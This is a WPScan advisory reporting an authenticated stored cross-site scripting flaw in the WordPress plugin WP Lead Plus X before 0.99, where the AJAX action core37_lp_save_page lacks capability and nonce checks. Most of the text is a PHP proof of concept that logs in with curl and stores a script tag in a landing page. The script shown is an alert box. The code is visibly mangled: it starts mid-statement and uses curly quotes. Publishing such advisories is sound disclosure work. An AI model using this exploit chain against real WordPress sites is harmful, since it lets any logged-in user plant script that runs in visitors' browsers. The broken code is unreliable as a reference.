
wpvulndb · Ramuel Gall · WPVDB-ID: DBBADA0B-E7FC-4CB5-ABD8-4A3A6545FE2F
History: Apr 07, 2020 - 12:00 a.m.

WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)

2020-04-07 00:00:00
Ramuel Gall
wpscan.com
5

0.001 Low

EPSS

Percentile

25.0%

WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder saved and updated pages through an unprotected AJAX action, core37_lp_save_page, which performed neither a capability check nor a nonce check. Because neither check was present, any authenticated user could call this action to store arbitrary script in a page (stored XSS).

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘wp-submit’ => ‘Log+In’, ‘testcookie’ => ‘1’ ))); $output = curl_exec($ch); curl_close($ch); //Insert a page with stored XSS $params=array( ‘pageContent’ => “%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert(‘xss!’)%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20”, ‘pageID’ => isset($argv[4]) ? 
$argv[4] : ‘0’, ‘pageSlug’=>‘poctest’, ‘pageTitle’ => ‘PoCTest’, ‘pageSettings’ => ‘{“isVariant”:false,“isPage”:true,“variantPageID”:0,“webFonts”:[],“modelsJSON”:{“c37-section-643520”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“layout”:12,“containerClass”:“”,“etype”:“section”,“editingElementID”:“c37-section-643520”},“c37-row-326243”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“horizontal”:“”,“vertical”:“”,“layout”:“12”,“etype”:“row”,“editingElementID”:“c37-row-326243”},“c37-box-865567”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“horizontal”:“”,“vertical”:“”,“size”:{“desktop”:12,“tablet”:12,“phone”:12},“direction”:“flex-column”,“etype”:“box”,“editingElementID”:“c37-box-865567”},“c37-code-108583”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“code”:“%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E”,“etype”:“code”,“editingElementID”:“c37-code-108583”},“page”:{“action”:{},“hidden”:{“d
esktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“width”:“700”,“codes”:{“trackingCode”:“”,“experimentCode”:“”,“beforeBodyClosing”:“”,“afterBodyOpening”:“”,“metaCode”:“”,“customCSSCode”:“”},“pageTitle”:“PoC”,“pageSlug”:“poc”,“weight”:“1”,“cssID”:“c37-lp-172110”,“editingElementID”:“page”,“etype”:“page”}},“flipCountdown”:{},“simpleCountdown”:{},“previewURL”:“”,“imageSliders”:{},“weight”:1,“elementsActions”:{},“jsCodes”:{},“compiledCSS”:“”}’, ‘action’ => ‘core37_lp_save_page’ ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘wp-admin/admin-ajax.php’); curl_setopt($ch,CURLOPT_USERAGENT,‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’, ‘Connection: close’)); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); $output = curl_exec($ch); echo $output; curl_close($ch);

